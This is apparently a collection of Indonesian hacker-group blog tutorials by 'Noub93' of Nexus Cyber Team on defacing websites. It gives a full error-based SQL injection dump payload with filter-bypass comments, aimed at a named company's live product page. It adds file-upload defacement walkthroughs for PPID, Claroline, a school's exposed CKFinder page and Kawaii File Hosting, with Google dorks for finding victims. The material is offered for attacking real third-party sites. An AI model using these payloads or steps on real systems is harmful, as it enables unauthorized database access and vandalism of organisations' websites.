Tutorial SQL chall ( error based )

Assalamualaikum




Ketemu lagi dengan gua Noub93 Gans,akan ngasi tutor Sql Error Based

Untuk chall nya :  http://inhutani4.co.id/produk.php?type=Produk&id=12

#ALAT" TEMPUR:V

•>siapin kuota

•>Dios 

Untuk dios nya : CoNcAt/**8***/(0x3c63656e7465723e272c273c696d67207372633d2268747470733a2f2f692e6962622e636f2f637666376643732f32303230303630372d3232343531352e706e6722206865696768743d223330307078222077696474683d22333030707822272c273c2f63656e7465723e272c273c2f62723e272c273c666f6e7420636f6c6f723d22626c61636b222073697a653d223525223e4e6f756239332047616e733c2f666f6e743e3c2f62723e3c666f6e7420636f6c6f723d22626c61636b222073697a653d223525223e4e65787573204379626572205465616d3c2f666f6e743e3c62723e,0x555345523a3e,current_user,0x3c62723e,0x56455253494f4e3a3e,version(),0x3c62723e,%200x504c5547494e3a3e,@@plugin_dir,%200x3c62723e,%200x53594d4c494e4b3a3e,@@GLOBAL.have_symlink,%200x3c62723e,%200x484f53544e414d453a3e,@@hostname,%200x3c62723e,0x3c666f6e7420636f6c6f723d22626c7565223e,(select(@x)/*!50000From*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000Information_schema.columns*/)/*!50000Where*/(table_schema=database/*data*//**8**/())and(0x00)in(@x:=/*!50000coNcat*/(@x,0x3c6c693e,/*!50000table_name*/,0x3a3a,/*!50000column_name*/))))x))--+-

Lanjut aja ke tutor nya ......

Kalian buka aja di google http://inhutani4.co.id/produk.php?type=Produk&id=12

Maka tampilan akan menjadi seperti ini


Cara mengetahui Vuln atau ngga nya kalian tambahin '

Jika sudah maka tampilan akan menjadi seperti ini



Berarti itu vuln okehhh

Lanjuttt....

Tambahin order+by+1--+-

Kalian cari sampe nemu yg erorr

order+by+1,2--+-

order+by+1,2,3--+-

order+by+1,2,3,4--+-


Nah disini gua nemu nya di angka 5

order+by+1,2,3,4,5--+-



Berarti angka ajaib nya ada di no 4 

Cara untuk mengecek nya?

Kalian ganti order+by nya menjadi union select

Disini gua pake yg bypas

+AND+0+/*!50000%55niON*/+/*!50000%53eLeCt*/+1,2,3,4--+-

Biar nemu togel nya:v

karna ini harus di bypas 

Lanjut ae .....

Contoh : http://inhutani4.co.id/produk.php?type=Produk&id=12%27+AND+0+/*!50000%55niON*/+/*!50000%53eLeCt*/+1,2,3,4--+-

Maka tampilan menjadi seperti ini



Nah dah ketemu togel nya

Lalu masukin dios kalian di angka togel barusan!!

Contoh : http://inhutani4.co.id/produk.php?type=Produk&id=12%27+AND+MOD(9,9)+/*!50000UNION/****/*/+/*!50000SELECT/****/*/+1,2,3,CoNcAt/**8***/(0x3c63656e7465723e272c273c696d67207372633d2268747470733a2f2f692e6962622e636f2f637666376643732f32303230303630372d3232343531352e706e6722206865696768743d223330307078222077696474683d22333030707822272c273c2f63656e7465723e272c273c2f62723e272c273c666f6e7420636f6c6f723d22626c61636b222073697a653d223525223e4e6f756239332047616e733c2f666f6e743e3c2f62723e3c666f6e7420636f6c6f723d22626c61636b222073697a653d223525223e4e65787573204379626572205465616d3c2f666f6e743e3c62723e,0x555345523a3e,current_user,0x3c62723e,0x56455253494f4e3a3e,version(),0x3c62723e,%200x504c5547494e3a3e,@@plugin_dir,%200x3c62723e,%200x53594d4c494e4b3a3e,@@GLOBAL.have_symlink,%200x3c62723e,%200x484f53544e414d453a3e,@@hostname,%200x3c62723e,0x3c666f6e7420636f6c6f723d22626c7565223e,(select(@x)/*!50000From*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000Information_schema.columns*/)/*!50000Where*/(table_schema=database/*data*//**8**/())and(0x00)in(@x:=/*!50000coNcat*/(@x,0x3c6c693e,/*!50000table_name*/,0x3a3a,/*!50000column_name*/))))x))--+-

Nah maka tampilan akan menjadi gini


Sekian dari gua Dan terimakasih

#Nexus Cyber Team

Tutorial Deface Poc PPID ARBITRARY FILE EXECUTION

  Assalamualaikum



Balik lagi dengan saya Noub93 Gans:v Kali ini saya akan ngasih tutorial Poc PPID ARBITRARY FILE EXECUTION
  1.  

Langsung aja ke tutor nya....
Oke karna saya langsng pake live target biar cepat:v

Yang pertama" kita harus daftar dulu
Pencet ikon garis 3 di pojok kanan atas 
Lalu klik daftar akun

Jika sudah ,maka tampilan akan seperti ini :

Lalu kalian daftar aja bisa ngasal 
Kecuali email aktif !! Karna butuh verifikasi nya.


Jika sudah daftar maka tampilan jadi seperti ini :
Jika sudah kalian cek email aktif nya atau sementara



Lalu kalian klik aktifkan akun anda disini

Jika sudah maka tampilan akan seperti ini :

Sekarang email nya sudah aktif,lalu kalian login...
Cara nya klik titik 3 di pojok kanan atas ,seperti di gambar

Jika sudah login maka tampilan akan menjadi :

Lalu bagaimana cara upload sc nya?
Kalian pencet lihat propile yg berwana kuning :v


Jika sudah maka tampilan akan menjadi :


Lalu kalian pencet ganti foto : masukin sc deface kalian 



Jika sudah  maka tampilan akan menjadi :

Lalu kalian tekan pecahan gambar nya ,lalu lihat gambar 


Maka hasil nya menjadi seperti ini :

Sekian dari saya Noub93 Wassalamu'alaikum wr.wb


MY TEAM : Nexus Cyber Team

Admin: Noub93 - Wardijien - R00tz - SATANICHEARTZ

Tutorial Deface Poc Claroline File Upload

 Assalamualaikum

   


 Saya Noub93,Ingin ngasih Tutor Cara

Deface Poc Claroline File Upload




Oke langsung aja ke tutor nya

Pertama" siapkan bahan :v
Alat dan Bahan
-> Sinyal
-> Script Deface
-> Kopi biar semangat :v
-> Dork
intext:”Powered by Claroline” site:




Lanjut aja ke tutor nya

dorking di browser terlebih dahulu  
                         


-> lalu pilih target yg mo kalian deface -_


-> kalau sudah creat new acount

Maka tampilan menjadi seperti ini 

Kalian bebas isi ngasal yg mudah di inget ya.... Action nya ganti jadi guru (wajib:v)
Nah jika sudah pencet oke

Maka tampilan akan menjadi seperti ini


Lalu pencet next

Maka tampilan menjadi seperti ini


Lalu kalian klik create a cource site ....

Maka tampilan akan menjadi seperti ini

Kalian isi aja bebas, untuk code sama category nya wajib diisi


Jika sudah maka tampilan akan menjadi seperti ini

Lalu klean klik continue

Jika sudah maka akan seperti ini

Lalu kalian pencet yg barusan kita buat....


Kalian pencet document

Jika sudah nanti langsung kalian upload aja sc nya di tempat upload....
Jika sudah di upload,nanti akan muncul hasilnya lalu kalian klik aja ......


Maka hasilnya akan menjadi :


Sekian dari saya Noub93 Wassalamu'alaikum wr wb

My Team : Nexus Cyber Team
#Suport Team : Skull Cyber Scurity, Doraemon Cyber Team, Bomber Cyber Army 7-SRT, Gap Finder Indonesia

Tutorial Deface Poc E-learning

  Assalamualaikum







Balik lagi sama saya Noub93 Gans -_ Kali ini saya akan kasih tutor cara deface poc e-learning 



•> Bahan - Bahan

- Kuota

- Dork: E-learning Madrasah - Halaman Login


- Exploit : __statics/ckdrive/ckfinder.html

- Sc = .txt .png .jpg (ga suport html/php)


Live Target : 

http://elearningmin3mojokerto.sch.id/__statics/ckdrive/ckfinder.html

Lngsng aja ke tutor :v

Karna ada live target,jadi saya pake live target aja-_



Cara cek vuln atau ngga?

Jika sudah di tambahkan exploit maka akan menuju tempat upload, seperti digambar




Jika sudah kalian langsng aja upload 

Cara manggil nya?

Bisa langsng klik aja file yg di upload tadi

Atau  contoh

http://contoh.com/__statics/gudangsoal/files/Zuz.txt




Maka hasil nya akan menjadi 


Sekian dari Saya Noub93 Gans, Wassalamu'alaikum


My Team : Nexus Cyber Team


Admin : Noub93 - Wardijien -  R00TZ - SATANICHEARTZ

Partner Nexus Cyber Team














*Nexus Cyber Team*


*Partner*
INDONESIAN CODER TEAM
ALIANSI CYBER INDONESIA
SKULL CYBER SCURITY
DORAEMON CYBER TEAM
BOMBER CYBER ARMY



 

Tutorial Deface Kawai File Hosting

Assalamualaikum , kali ini gua Noub93 bakal kasih Tutorial Cara Deface Poc Kawaii File Hosting, oke langsung aja

Bahan² :
1. Google
2. Internet
3. File ber ext = jpg.html.gif.txt

Dork : Kawaii File Hosting
Kawaii File Host

1.) Kalian dorking dulu di Google
2.) Kalian pilih target yang kalian mau deface
3.) Kalian klik Select or drop File(s) Dan kalian upload File kalian
4.) Kalau sudah terupload bakal muncul link nya, kalian tinggal klik linknya
5.) Boom telah terdeface
Kalianklik  aja hasilnya


KebetulanNCTOfficial  Lagi Opmem Mau Join ? Chat aja dulu 085884978395 Skrng :v

Cara Membuat Tulisan Berjalan Pada Sc Deface

ASSALAMUALAIKUM Gua Mr.Noub93&TampanMaut
Akan Ngasih Tutor Cara membuat Tulisan berjalan

jika lu ingin, membuat tulisan berjalan maka silahkan simak caranya Dibawah !

(-) Kode dasar marquee
 untuk membuat tulisan berjalan adalah :
<marquee>TULISAN BERJALAN</marquee>
Hasilnya  :
 
TULISAN BERJALAN
kode di atas merupakan bentuk kode dasar, Diperlukan tambahan kode lain jika menginginkan variasi gerak lainnya dari sebuah marquee.



 (-) kode bgcolor="warna" , kode ini digunakan untuk mengatur warna background tulisan berjalan. "warna" dapat diganti menggunakan bahasa Inggris yang menyatakan jenis warna 

Contoh perintahnya :
<marquee bgcolor="yellow">TEXT DENGAN BACKGROUND KUNING</marquee> 

hasilnya : 


 TEXT DENGAN BACKGROUND KUNING
Lalu kalian masukin ke sc deface nya dah selesai:)
Hehehe Saya Mr.Noub93 Izin Pamit